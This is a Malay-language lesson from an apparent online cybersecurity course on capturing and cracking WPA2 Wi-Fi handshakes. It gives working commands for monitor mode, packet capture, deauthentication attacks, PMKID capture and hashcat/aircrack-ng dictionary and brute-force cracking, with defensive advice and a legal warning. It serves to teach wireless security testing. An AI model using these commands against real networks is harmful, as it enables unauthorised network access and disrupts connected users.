Cyber Security Academy · Pelajaran

Menangkap dan Memecahkan Jabat Tangan WPA2

Tangkap jabat tangan 4 hala dengan aircrack-ng dan cuba serangan kamus menggunakan Hashcat.

Pelajaran 2 daripada 413 langkah

Menangkap dan Memecahkan Jabat Tangan WPA2 ialah pelajaran Cyber Security Academy percuma di CoddyKit. Ini ialah pelajaran 2 daripada 4. Sebanyak 3 pelajaran dalam laluan pembelajaran ini boleh dibaca sepenuhnya secara percuma — selepas itu, CoddyKit PRO membuka akses kepada semua pelajaran, serta latihan praktikal dengan penyunting kod terbina dalam dan tutor kecerdasan buatan yang tersedia 24/7. Pelajaran ini merupakan sebahagian daripada laluan pembelajaran Cyber Security Academy, dan kemajuan anda disegerakkan merentas web serta aplikasi CoddyKit. Kursus Cyber Security Academy merangkumi sejumlah 4 pelajaran.

Jabat Tangan 4 Hala

Apabila klien bersambung ke rangkaian WPA2, jabat tangan 4 hala menerbitkan Kunci Sementara Berpasangan (PTK) daripada PMK (yang diterbitkan daripada PSK) dan nilai rawak sekali guna. Menangkap jabat tangan ini membolehkan pemecahan kata laluan luar talian.

Menyediakan Mod Pemantauan

Mod pemantauan membolehkan kad tanpa wayar menangkap semua bingkai tanpa mengira destinasi — diperlukan untuk menangkap jabat tangan secara pasif. Mod ini hanya berfungsi dengan kad yang menyokongnya.

# Check wireless interface
iwconfig

# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon

# Kill interfering processes first:
sudo airmon-ng check kill

Penangkapan Jabat Tangan Pasif

Airodump-ng menangkap bingkai secara pasif. Tunggu klien bersambung secara semula jadi, atau paksa sambungan semula melalui nyahpengesahan. Penangkapan jabat tangan dipaparkan di bahagian atas kanan hasil airodump.

# Scan for networks
sudo airodump-ng wlan0mon

# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w handshake_capture \
  wlan0mon

# Top right shows: WPA handshake: AA:BB:...

Serangan Nyahpengesahan

Menghantar bingkai nyahpengesahan palsu memaksa klien yang bersambung untuk memutuskan sambungan dan bersambung semula, lalu mencetuskan penangkapan jabat tangan baharu. Tindakan ini bising dan boleh dikesan, serta memerlukan klien berada dalam julat.

# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
  -a AA:BB:CC:DD:EE:FF \
  -c CC:DD:EE:FF:00:11 \
  wlan0mon

# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)

Serangan PMKID: Tiada Klien Diperlukan

Serangan PMKID (hcxdumptool) menangkap PMKID daripada bingkai suar/tinjauan tanpa memerlukan klien yang bersambung. Lebih pantas untuk diperoleh dan sama mudah dipecahkan seperti jabat tangan penuh.

# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
  -o pmkid.pcapng

# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng

# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txt

Memecahkan Jabat Tangan dengan Hashcat

Tukarkan fail tangkapan dan lakukan serangan dengan mod Hashcat 22000 (format bersatu WPA2) atau mod 2500 (format lama). Gunakan rockyou.txt bersama peraturan untuk mendapatkan hasil terbaik.

# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap

# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt

# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule

# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

Memecahkan dengan Aircrack-ng

Aircrack-ng melakukan pemecahan WPA2 berasaskan CPU terus daripada fail tangkapan. Lebih perlahan berbanding pemecahan GPU Hashcat, tetapi tidak memerlukan penukaran format.

# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap

# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.cap

Strategi Senarai Perkataan

Kejayaan pemecahan kata laluan WPA2 bergantung sepenuhnya pada kualiti senarai perkataan. Gunakan: rockyou.txt sebagai asas, set peraturan Hashcat untuk pengubahsuaian, senarai perkataan khusus syarikat (nama+tahun+simbol), dan senarai disasarkan daripada OSINT.

Realiti Masa Pemecahan

Kata laluan WPA2 rawak yang mempunyai 20 aksara atau lebih tidak munasabah untuk dipecahkan dari segi pengiraan. Pemecahan hanya praktikal terhadap kata laluan pendek atau berasaskan kamus. Inilah sebabnya panjang dan kerawakan kata laluan lebih penting daripada peraturan kerumitan.

Pertahanan

Gunakan WPA3-SAE (kebal terhadap serangan kamus luar talian), atau WPA2 dengan frasa laluan rawak yang mempunyai 20 aksara atau lebih, serta WPA2-Enterprise dengan EAP-TLS (sijil dan bukannya kata laluan).

Peringatan Undang-undang

Menangkap jabat tangan WPA2 pada rangkaian yang bukan milik anda adalah menyalahi undang-undang. Semua teknik di sini hanya terpakai pada rangkaian ujian milik anda sendiri atau persekitaran makmal yang dibenarkan (contohnya, makmal rumah atau AP ujian khusus).

Semakan Pantas

Apakah kelebihan serangan PMKID berbanding penangkapan jabat tangan standard?

Ringkasan: Pemecahan WPA2

Menangkap jabat tangan WPA2 (atau PMKID) menukarkan pemecahan WiFi kepada serangan kamus luar talian. Kejayaan bergantung sepenuhnya pada kekuatan kata laluan — kata laluan pendek dan berasaskan kamus mudah dipecahkan; kata laluan rawak yang panjang secara praktikalnya tidak boleh dipecahkan. Pertahankan rangkaian dengan WPA3-SAE, frasa laluan kukuh dan WPA2-Enterprise untuk rangkaian korporat.

Percuma untuk bermula

Pelajari Cyber Security Academy dengan tutor kecerdasan buatan — percuma

Tulis dan jalankan kod sebenar dalam pelayar anda, dapatkan bantuan segera daripada tutor kecerdasan buatan yang tersedia 24/7, dan sambung semula dari tempat anda berhenti di web atau dalam aplikasi.

Kursus
76
Pelajaran
303

Soalan Lazim

Adakah pelajaran “Menangkap dan Memecahkan Jabat Tangan WPA2” percuma?

Ya — sebanyak 3 pelajaran dalam laluan pembelajaran Cyber Security Academy, termasuk “Menangkap dan Memecahkan Jabat Tangan WPA2”, boleh dibaca sepenuhnya secara percuma di web ini. Selepas itu, CoddyKit PRO membuka akses kepada semua pelajaran, serta latihan interaktif dengan penyunting kod terbina dalam dan tutor kecerdasan buatan yang tersedia 24/7. Kursus Cyber Security Academy merangkumi sejumlah 4 pelajaran.

Apakah yang akan saya pelajari dalam “Menangkap dan Memecahkan Jabat Tangan WPA2”?

Tangkap jabat tangan 4 hala dengan aircrack-ng dan cuba serangan kamus menggunakan Hashcat. Anda berlatih Cyber Security Academy menggunakan kod praktikal yang dijalankan terus dalam pelayar, manakala tutor kecerdasan buatan 24/7 menjawab soalan anda semasa anda mengikuti pelajaran.

Adakah saya memerlukan pengalaman untuk memulakan Cyber Security Academy?

Tiada pengalaman terdahulu diperlukan. Pembelajaran Cyber Security Academy di CoddyKit disusun untuk pelajar daripada peringkat pemula hingga lanjutan, jadi anda boleh bermula di sini atau dari awal dan belajar mengikut kadar anda sendiri. Ini ialah pelajaran 2 daripada 4.

Berapa lamakah pelajaran “Menangkap dan Memecahkan Jabat Tangan WPA2” diambil?

Kebanyakan pelajaran CoddyKit mengambil masa kira-kira 5–10 minit. Setiap pelajaran ringkas dan interaktif, jadi anda boleh membuat kemajuan secara berterusan dan menyambung tepat dari tempat anda berhenti di web atau aplikasi.

Bolehkah saya menulis dan menjalankan kod dalam pelajaran Cyber Security Academy ini?

Ya. Setiap pelajaran Cyber Security Academy menyertakan penyunting kod terbina dalam, jadi anda boleh menulis dan menjalankan kod sebenar terus dalam pelayar serta menerima maklum balas kecerdasan buatan serta-merta — tanpa memerlukan persediaan setempat.

Semua pelajaran dalam kursus ini

  1. Protokol Keselamatan 802.11: WEP, WPA2, WPA3
  2. Menangkap dan Memecahkan Jabat Tangan WPA2
  3. Serangan Evil Twin dan Portal Tawanan
  4. Wi-Fi Perusahaan: EAP dan RADIUS
← Kembali ke Cyber Security Academy